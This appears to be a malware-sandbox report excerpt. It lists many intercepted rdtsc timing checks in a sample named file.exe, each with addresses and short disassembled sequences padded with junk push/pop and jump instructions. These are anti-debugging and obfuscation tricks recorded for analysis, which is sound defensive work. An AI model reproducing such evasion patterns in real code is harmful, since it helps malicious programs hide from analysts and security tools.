Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D7C4B second address: 8D7C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F81D4B5DC72h 0x0000000d pushad 0x0000000e jnc 00007F81D4B5DC56h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6F21 second address: 8D6F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6F39 second address: 8D6F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F81D4B5DC67h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6F56 second address: 8D6F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D70C3 second address: 8D70CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F81D4B5DC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D70CD second address: 8D70E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D5048961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D70E6 second address: 8D70F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F81D4B5DC56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D70F0 second address: 8D70F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D73C1 second address: 8D73CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D74F9 second address: 8D74FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D7652 second address: 8D765C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D765C second address: 8D7673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F81D504895Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D7673 second address: 8D7681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D7681 second address: 8D7687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D7687 second address: 8D768B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D768B second address: 8D76AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F81D5048956h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DABA6 second address: 8DABAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DA50B second address: 8DA50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2519 second address: 8E251D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2D39 second address: 8E2D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2D42 second address: 8E2D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2D48 second address: 8E2D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E2FFE second address: 8E3002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3C20 second address: 8E3C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3C24 second address: 8E3C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3C37 second address: 8E3C7A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F81D5048972h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F81D5048969h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3F32 second address: 8E3F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jc 00007F81D4B5DCA1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F81D4B5DC63h 0x00000017 jns 00007F81D4B5DC56h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3F69 second address: 8E3F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E3F6D second address: 8E3F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F81D4B5DC66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E825E second address: 8E826C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F81D5048956h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E7427 second address: 8E742D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E742D second address: 8E7435 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E7435 second address: 8E7441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F81D4B5DC56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E75C5 second address: 8E75D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E75D7 second address: 8E75DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E79A3 second address: 8E79A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E7B42 second address: 8E7B59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F81D4B5DC5Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E7CE3 second address: 8E7CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F81D5048956h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8ECBA1 second address: 8ECBA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 839428 second address: 839450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D504895Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007F81D5048967h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F60B6 second address: 8F60BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F60BE second address: 8F60C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F60C3 second address: 8F60E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007F81D4B5DC56h 0x00000009 ja 00007F81D4B5DC56h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jnp 00007F81D4B5DC5Ch 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F60E7 second address: 8F60ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6566 second address: 8F656A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F656A second address: 8F656E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6827 second address: 8F6851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC64h 0x00000007 jmp 00007F81D4B5DC5Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6B18 second address: 8F6B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6B21 second address: 8F6B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6D9A second address: 8F6DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Eh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6DAE second address: 8F6DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6DB6 second address: 8F6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6DBA second address: 8F6DD4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F81D4B5DC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F81D4B5DC5Ah 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F6DD4 second address: 8F6DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FE86D second address: 8FE87C instructions: 0x00000000 rdtsc 0x00000002 js 00007F81D4B5DC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FE87C second address: 8FE88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F81D5048956h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909E75 second address: 909E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90C48C second address: 90C492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90C492 second address: 90C498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90C498 second address: 90C4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90C4A4 second address: 90C4AE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F81D4B5DC56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90EB6A second address: 90EB6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912920 second address: 912929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912929 second address: 91292D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91292D second address: 912935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91E52A second address: 91E537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F81D5048958h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91E537 second address: 91E53E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91E53E second address: 91E544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91E544 second address: 91E56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F81D4B5DC69h 0x0000000d jp 00007F81D4B5DC5Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91E56F second address: 91E576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924F99 second address: 924F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92512B second address: 925136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F81D5048956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92554E second address: 925554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 925554 second address: 92555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92555A second address: 925562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 925562 second address: 92557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D5048964h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92557D second address: 925584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9259A0 second address: 9259AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F81D5048956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9259AC second address: 9259B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9259B3 second address: 9259B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B4C2 second address: 92B4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B4CB second address: 92B4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B4D1 second address: 92B4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F81D4B5DC5Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B058 second address: 92B05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92CB05 second address: 92CB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F81D4B5DC61h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92CB22 second address: 92CB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F81D5048956h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92CB2E second address: 92CB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F81D4B5DC56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F81D4B5DC56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930BE6 second address: 930C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F81D5048956h 0x0000000d pop ecx 0x0000000e jng 00007F81D504895Ch 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F81D504895Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A40 second address: 930A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A44 second address: 930A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A4C second address: 930A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A51 second address: 930A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A59 second address: 930A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A66 second address: 930A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A6A second address: 930A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A70 second address: 930A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 930A76 second address: 930A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934850 second address: 934858 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934858 second address: 934863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934863 second address: 934875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D504895Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C34C second address: 93C37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F81D4B5DC5Eh 0x00000009 popad 0x0000000a jnl 00007F81D4B5DC6Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C37B second address: 93C380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C380 second address: 93C388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93DC1D second address: 93DC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93DC21 second address: 93DC32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D4B5DC5Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93DC32 second address: 93DC47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F81D504895Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
